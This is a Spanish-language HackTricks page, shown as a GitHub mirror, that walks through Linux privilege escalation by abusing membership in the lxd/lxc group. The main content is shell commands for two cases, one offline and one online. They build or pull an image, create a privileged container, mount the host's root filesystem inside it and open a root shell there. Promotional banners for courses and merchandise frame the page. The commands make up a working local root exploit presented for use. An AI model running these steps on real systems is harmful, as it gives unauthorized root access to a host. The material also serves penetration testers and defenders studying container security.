mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-11 22:03:10 +00:00
86 lines
4.1 KiB
Markdown
86 lines
4.1 KiB
Markdown
<details>
|
|
|
|
<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Otras formas de apoyar a HackTricks:
|
|
|
|
* Si quieres ver a tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF**, consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
|
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
|
|
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sigue**me en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
* **Comparte tus trucos de hacking enviando PRs a los repositorios de github** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|
|
|
|
|
|
Si perteneces al grupo _**lxd**_ **o** _**lxc**_, puedes convertirte en root
|
|
|
|
# Explotación sin internet
|
|
|
|
Puedes instalar en tu máquina este constructor de distribuciones: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder) (sigue las instrucciones del github):
|
|
```bash
|
|
#Install requirements
|
|
sudo apt update
|
|
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
|
|
#Clone repo
|
|
go get -d -v github.com/lxc/distrobuilder
|
|
#Make distrobuilder
|
|
cd $HOME/go/src/github.com/lxc/distrobuilder
|
|
make
|
|
cd
|
|
#Prepare the creation of alpine
|
|
mkdir -p $HOME/ContainerImages/alpine/
|
|
cd $HOME/ContainerImages/alpine/
|
|
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
|
|
#Create the container
|
|
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml
|
|
```
|
|
Luego, sube al servidor los archivos **lxd.tar.xz** y **rootfs.squashfs**
|
|
|
|
Agrega la imagen:
|
|
```bash
|
|
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
|
|
lxc image list #You can see your new imported image
|
|
```
|
|
Crear un contenedor y añadir la ruta de root
|
|
```bash
|
|
lxc init alpine privesc -c security.privileged=true
|
|
lxc list #List containers
|
|
|
|
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
|
|
```
|
|
Ejecuta el contenedor:
|
|
```bash
|
|
lxc start privesc
|
|
lxc exec privesc /bin/sh
|
|
[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted
|
|
```
|
|
# Con internet
|
|
|
|
Puedes seguir [estas instrucciones](https://reboare.github.io/lxd/lxd-escape.html).
|
|
```bash
|
|
lxc init ubuntu:16.04 test -c security.privileged=true
|
|
lxc config device add test whatever disk source=/ path=/mnt/root recursive=true
|
|
lxc start test
|
|
lxc exec test bash
|
|
[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted
|
|
```
|
|
# Otras Referencias
|
|
|
|
{% embed url="https://reboare.github.io/lxd/lxd-escape.html" caption="" %}
|
|
|
|
|
|
|
|
<details>
|
|
|
|
<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Otras formas de apoyar a HackTricks:
|
|
|
|
* Si quieres ver a tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF**, consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
|
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
|
|
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
* **Comparte tus trucos de hacking enviando PRs a los repositorios de github de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|